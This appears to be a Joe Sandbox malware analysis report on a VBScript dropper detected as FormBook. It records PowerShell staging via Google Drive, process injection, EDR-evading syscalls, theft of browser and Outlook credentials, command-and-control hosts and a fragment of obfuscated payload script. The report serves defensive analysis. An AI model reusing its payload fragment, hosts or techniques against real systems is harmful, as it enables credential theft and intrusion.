        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe NtSetInformationProcess: Direct from: 0x77542C5C
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe NtOpenKeyEx: Direct from: 0x77542B9C
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe NtCreateFile: Direct from: 0x77542FEC
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe NtOpenFile: Direct from: 0x77542DCC
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe NtQueryInformationToken: Direct from: 0x77542CAC
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe NtDeviceIoControlFile: Direct from: 0x77542AEC
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe NtAllocateVirtualMemory: Direct from: 0x77542BEC
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe NtQueryVolumeInformationFile: Direct from: 0x77542F2C
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe NtOpenSection: Direct from: 0x77542E0C
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe NtAllocateVirtualMemory: Direct from: 0x775448EC
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe NtSetInformationThread: Direct from: 0x775363F9
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe NtQuerySystemInformation: Direct from: 0x775448CC
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe NtClose: Direct from: 0x77542B6C
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe NtReadVirtualMemory: Direct from: 0x77542E8C
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe NtCreateKey: Direct from: 0x77542C6C
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe NtSetInformationThread: Direct from: 0x77542B4C
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe NtQueryAttributesFile: Direct from: 0x77542E6C
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe NtAllocateVirtualMemory: Direct from: 0x77543C9C
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe NtCreateUserProcess: Direct from: 0x7754371C
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe NtQueryInformationProcess: Direct from: 0x77542C26
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe NtResumeThread: Direct from: 0x77542FBC
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe NtWriteVirtualMemory: Direct from: 0x7754490C
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe NtDelayExecution: Direct from: 0x77542DDC
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe NtAllocateVirtualMemory: Direct from: 0x77542BFC
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe NtReadFile: Direct from: 0x77542ADC
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe NtQuerySystemInformation: Direct from: 0x77542DFC
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe NtResumeThread: Direct from: 0x775436AC
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe NtNotifyChangeKey: Direct from: 0x77543C2C
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe NtCreateMutant: Direct from: 0x775435CC
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe NtWriteVirtualMemory: Direct from: 0x77542E3C
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe NtMapViewOfSection: Direct from: 0x77542D1C
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe protection: execute and read and write
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe Section loaded: NULL target: C:\Windows\SysWOW64\replace.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\replace.exe Section loaded: NULL target: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe protection: read write
        Source: C:\Windows\SysWOW64\replace.exe Section loaded: NULL target: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\replace.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
        Source: C:\Windows\SysWOW64\replace.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\replace.exe Thread register set: target process: 2284
        Source: C:\Windows\SysWOW64\replace.exe Thread APC queued: target process: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3000000
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2CEF9C0
        Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell command line]
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Medikamentel.Ddg && echo $"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell command line]
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Medikamentel.Ddg && echo $"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe Process created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"
        Source: C:\Windows\SysWOW64\replace.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
vortthalvfx fejetautos strue-udsagvkunsta cpmmludmatusadl.e flin hjemm$,aderfthromoliv or e aafhulnirstanddsennaiarkitgimmigeglosetrubbe;he er ');surere (herremaend 'alkylimuddlfalb i udpi(antiotavissepleurskbsvatmiddl-kronip tanda vipetdu,tthzygne grandtliche:lusk.\gruppta skiespindskantetbajadupirridhvedeo gobl.stra,tsamarxreg st ultr)globa{poly e eostxhillbi skubtraadf} sual;trise ');$tidsskriftsudvlgelserne = herremaend 'shille,lericrisikhkaldeo tjen l nje%ki,keabr.dop lendpbirthdno.sparevalt tiraasnebo% do,e\aastemnyst.efrankd tsaririskikannalawilmam,rfteelamb nbe,hptr.ttoesvveflcri,i.vandddpro,odtopsagddska lserf&halss&udl,s telefe ,ilccrkv,khpooftobugse malth$s are ';surere (herremaend 'gombe$tilbagspa.kl sgepo f,rfbpseu,askrd.l p.og:bi,psffo tirsl wdi kolitfremtubrinjr deciemalmintredi=s,pra(firsic bystmp umpd unde te,ot/pallhc rapg conta$.retct,elamiexu.ad .ibess.othsunto kprejursulteidelphftarlet utilsdiscrubo uldkinesvtilkrl mes,g dv,geergonlvrc.ssprotoesomikrhanden draweboxfi)outte ');surere (herremaend 'anstt$ pibogt,lstl ch,roparrobeutecaorkidlkan i:unsoctdrmmeinucl.r,eproe g
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Stealing of Sensitive Information

        Source: Yara match File source: 00000012.00000002.2595491228.0000000002250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000011.00000002.2595044684.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000011.00000002.2595118145.00000000029E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000011.00000002.2593836346.00000000024F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 0000000C.00000002.2249433724.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\SysWOW64\replace.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
        Source: C:\Windows\SysWOW64\replace.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\replace.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
        Source: C:\Windows\SysWOW64\replace.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
        Source: C:\Windows\SysWOW64\replace.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
        Source: C:\Windows\SysWOW64\replace.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
        Source: C:\Windows\SysWOW64\replace.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\replace.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
        Source: C:\Windows\SysWOW64\replace.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

        Remote Access Functionality

        Source: Yara match File source: 00000012.00000002.2595491228.0000000002250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000011.00000002.2595044684.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000011.00000002.2595118145.00000000029E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000011.00000002.2593836346.00000000024F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 0000000C.00000002.2249433724.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
        Gather Victim Identity Information | 221 Scripting | Valid Accounts | 1 Windows Management Instrumentation | 221 Scripting | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
        Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | LSASS Memory | 14 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
        Email Addresses | DNS Server | Domain Accounts | 11 Command and Scripting Interpreter | 1 Registry Run Keys / Startup Folder | 411 Process Injection | 3 Obfuscated Files or Information | Security Account Manager | 1 Query Registry | SMB/Windows Admin Shares | 1 Email Collection | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
        Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | 1 Registry Run Keys / Startup Folder | 1 Software Packing | NTDS | 21 Security Software Discovery | Distributed Component Object Model | Input Capture | 5 Application Layer Protocol | Traffic Duplication | Data Destruction
        Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Process Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
        Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 31 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
        DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 31 Virtualization/Sandbox Evasion | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
        Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 411 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
        Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Rundll32 | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement

        Behavior Graph ID: 1430770, Sample: 1000901 LIQUIDACION.vbs, Startdate: 24/04/2024, Architecture: WINDOWS, Score: 100
        Sample (node 2)
          DNS/IP: www.webwheelsmedia.com; www.dhleba51.ru; 3 other IPs or domains
          Signatures: Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; Yara detected FormBook; 3 other signatures
          Started: wscript.exe (node 12); wab.exe (node 15); wab.exe (node 17); rundll32.exe (node 19)
        wscript.exe (node 12)
          Signatures: VBScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 3 other signatures
          Started: powershell.exe (node 21)
        powershell.exe (node 21)
          DNS/IP: drive.google.com 142.250.101.100, 443, 49706, 49712 GOOGLEUS United States; drive.usercontent.google.com 142.251.2.132, 443, 49707, 49713 GOOGLEUS United States
          Signatures: Suspicious powershell command line found; Very long command line found; Found suspicious powershell code related to unpacking or dynamic code loading
          Started: powershell.exe (node 25); conhost.exe (node 28); cmd.exe (node 30)
        powershell.exe (node 25)
          Signatures: Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading
          Started: wab.exe (node 32); cmd.exe (node 35); wab.exe (node 37); wab.exe (node 39)
        wab.exe (node 32)
          Signatures: Maps a DLL or memory area into another process
          Injected: MSHXUddoGk.exe (node 41)
        MSHXUddoGk.exe (node 41)
          Signatures: Maps a DLL or memory area into another process; Found direct / indirect Syscall (likely to bypass EDR)
          Started: replace.exe (node 44)
        replace.exe (node 44)
          Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 2 other signatures
          Injected: MSHXUddoGk.exe (node 47)
          Started: firefox.exe (node 51)
        MSHXUddoGk.exe (node 47)
          DNS/IP: webwheelsmedia.com 162.241.253.78, 49715, 80 UNIFIEDLAYER-AS-1US United States; www.dhleba51.ru 195.24.68.5, 49716, 49717, 49718 RU-CENTERRU Russian Federation
          Signatures: Found direct / indirect Syscall (likely to bypass EDR)

        Source | Detection | Scanner | Label
        1000901 LIQUIDACION.vbs | 5% | ReversingLabs | Win32.Dropper.Generic

        No Antivirus matches
        No Antivirus matches

        Source | Detection | Scanner | Label
        webwheelsmedia.com | 3% | Virustotal |
        www.dhleba51.ru | 2% | Virustotal |
        www.webwheelsmedia.com | 2% | Virustotal |

        Source | Detection | Scanner | Label
        http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware
        https://go.micro | 0% | URL Reputation | safe
        https://contoso.com/ | 0% | URL Reputation | safe
        https://contoso.com/License | 0% | URL Reputation | safe
        https://contoso.com/Icon | 0% | URL Reputation | safe
        https://drive.googP | 0% | Avira URL Cloud | safe
        http://www.webwheelsmedia.com/im2z/?_Ny4=z4HNqRUNVhKU+Qtv1eU7JRxQK/gynbhJk0uSl0XlGEkve/f45BAiGTLGfSdewEtjJuikjLVXYXf/hVlacLZbmvfCaC2wD3OuQ9Qp/Q6XbR8wDKz6gQ==&B6H=rZ8dY | 0% | Avira URL Cloud | safe
        http://webwheelsmedia.com/im2z/?_Ny4=z4HNqRUNVhKU | 0% | Avira URL Cloud | safe
        http://www.dhleba51.ru/im2z/ | 100% | Avira URL Cloud | malware
        https://drive.usercontent.googh | 0% | Avira URL Cloud | safe
        http://www.dhleba51.ru/im2z/ | 0% | Virustotal |

        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        webwheelsmedia.com | 162.241.253.78 | true | false | | unknown
        www.dhleba51.ru | 195.24.68.5 | true | false | | unknown
        drive.google.com | 142.250.101.100 | true | false | | high
        drive.usercontent.google.com | 142.251.2.132 | true | false | | high
        www.webwheelsmedia.com | unknown | unknown | true | | unknown

        Name | Malicious | Antivirus Detection | Reputation
        http://www.webwheelsmedia.com/im2z/?_Ny4=z4HNqRUNVhKU+Qtv1eU7JRxQK/gynbhJk0uSl0XlGEkve/f45BAiGTLGfSdewEtjJuikjLVXYXf/hVlacLZbmvfCaC2wD3OuQ9Qp/Q6XbR8wDKz6gQ==&B6H=rZ8dY | false | Avira URL Cloud: safe | unknown
        http://www.dhleba51.ru/im2z/ | false | 0%, Virustotal; Avira URL Cloud: malware | unknown

        Name | Source | Malicious | Antivirus Detection | Reputation
        https://www.google.com | powershell.exe, 00000002.00000002.2177170811.000002B337F39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2177170811.000002B339C15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2177170811.000002B339C19000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.1893294150.0000000008A26000.00000004.00000020.00020000.00000000.sdmp | false | | high
        http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.2333966169.000002B347A73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1919062447.0000000005BA8000.00000004.00000800.00020000.00000000.sdmp | false | | high
        http://drive.usercontent.google.com | powershell.exe, 00000002.00000002.2177170811.000002B339C2C000.00000004.00000800.00020000.00000000.sdmp | false | | high
        http://pesterbdd.com/images/Pester.png | powershell.exe, 00000005.00000002.1915385370.0000000004C98000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
        https://aka.ms/pscore6lB | powershell.exe, 00000005.00000002.1915385370.0000000004B41000.00000004.00000800.00020000.00000000.sdmp | false | | high
        http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000005.00000002.1915385370.0000000004C98000.00000004.00000800.00020000.00000000.sdmp | false | | high
        https://go.micro | powershell.exe, 00000002.00000002.2177170811.000002B33858E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        https://contoso.com/ | powershell.exe, 00000005.00000002.1919062447.0000000005BA8000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.2333966169.000002B347A73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1919062447.0000000005BA8000.00000004.00000800.00020000.00000000.sdmp | false | | high
        https://contoso.com/License | powershell.exe, 00000005.00000002.1919062447.0000000005BA8000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        https://contoso.com/Icon | powershell.exe, 00000005.00000002.1919062447.0000000005BA8000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        https://drive.googP | powershell.exe, 00000002.00000002.2177170811.000002B339BEE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
        https://drive.google.com | powershell.exe, 00000002.00000002.2177170811.000002B337E10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2177170811.000002B339B94000.00000004.00000800.00020000.00000000.sdmp | false | | high
        https://drive.usercontent.googh | powershell.exe, 00000002.00000002.2177170811.000002B339C19000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
        https://drive.usercontent.google.com | powershell.exe, 00000002.00000002.2177170811.000002B337F3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2177170811.000002B339C19000.00000004.00000800.00020000.00000000.sdmp | false | | high
        https://drive.usercontent.google.com/ | wab.exe, 0000000C.00000003.2155565700.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000002.2273092683.0000000008A26000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.1897031351.0000000008A26000.00000004.00000020.00020000.00000000.sdmp | false | | high
        http://drive.google.com | powershell.exe, 00000002.00000002.2177170811.000002B339BF3000.00000004.00000800.00020000.00000000.sdmp | false | | high
        https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.2177170811.000002B337A01000.00000004.00000800.00020000.00000000.sdmp | false | | high
        https://apis.google.com | powershell.exe, 00000002.00000002.2177170811.000002B339C19000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.1893294150.0000000008A26000.00000004.00000020.00020000.00000000.sdmp | false | | high
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2177170811.000002B337A01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1915385370.0000000004B41000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://webwheelsmedia.com/im2z/?_Ny4=z4HNqRUNVhKUMSHXUddoGk.exe, 00000012.00000002.2596058187.0000000002C04000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.1915385370.0000000004C98000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
IP | Domain | Country | ASN | ASN Name | Malicious
162.241.253.78 | webwheelsmedia.com | United States | 46606 | UNIFIEDLAYER-AS-1US | false
195.24.68.5 | www.dhleba51.ru | Russian Federation | 48287 | RU-CENTERRU | false
142.251.2.132 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
142.250.101.100 | drive.google.com | United States | 15169 | GOOGLEUS | false
                                        Joe Sandbox version:40.0.0 Tourmaline
                                        Analysis ID:1430770
                                        Start date and time:2024-04-24 07:02:11 +02:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 9m 25s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:22
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:2
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:1000901 LIQUIDACION.vbs
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.expl.evad.winVBS@23/8@4/4
                                        EGA Information:
                                        • Successful, ratio: 25%
                                        HCA Information:
                                        • Successful, ratio: 84%
                                        • Number of executed functions: 99
                                        • Number of non-executed functions: 260
                                        Cookbook Comments:
                                        • Found application associated with file extension: .vbs
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                        • Execution Graph export aborted for target MSHXUddoGk.exe, PID 1172 because it is empty
                                        • Execution Graph export aborted for target powershell.exe, PID 7500 because it is empty
                                        • Execution Graph export aborted for target powershell.exe, PID 7728 because it is empty
